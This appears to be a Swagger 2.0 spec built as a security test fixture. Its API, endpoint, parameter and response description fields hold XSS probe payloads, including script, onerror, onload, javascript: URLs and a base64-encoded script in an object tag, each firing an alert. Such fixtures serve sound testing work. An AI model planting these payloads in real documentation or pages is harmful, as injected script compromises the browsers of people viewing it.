swagger: '2.0'
info:
  title: XSS Test API - Security Assessment
  description: |
    <script>alert("XSS in API Description")</script>
    <img src=x onerror=alert("onerror-XSS")>
    <svg/onload=alert("SVG-XSS")>
  version: 1.0.0
host: test.example.com
basePath: /v1
schemes:
  - http
produces:
  - application/json
consumes:
  - application/json
paths:
  /xss-test/{input}:
    get:
      tags:
        - XSS-Test
      summary: XSS Test Endpoint
      description: |
        <iframe src="javascript:alert('XSS in Endpoint Description')"></iframe>
      parameters:
        - name: input
          in: path
          description: |
            <img src=1 onerror=alert("XSS in Parameter Desc")>
            <math><maction actiontype="statusline#http://example.com" xlink:href="javascript:alert('Maction-XSS')"></math>
          required: true
          type: string
      responses:
        '200':
          description: |
            <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnT2JqZWN0LVhTUycpOzwvc2NyaXB0Pg=="></object>
securityDefinitions:
  basicAuth:
    type: basic
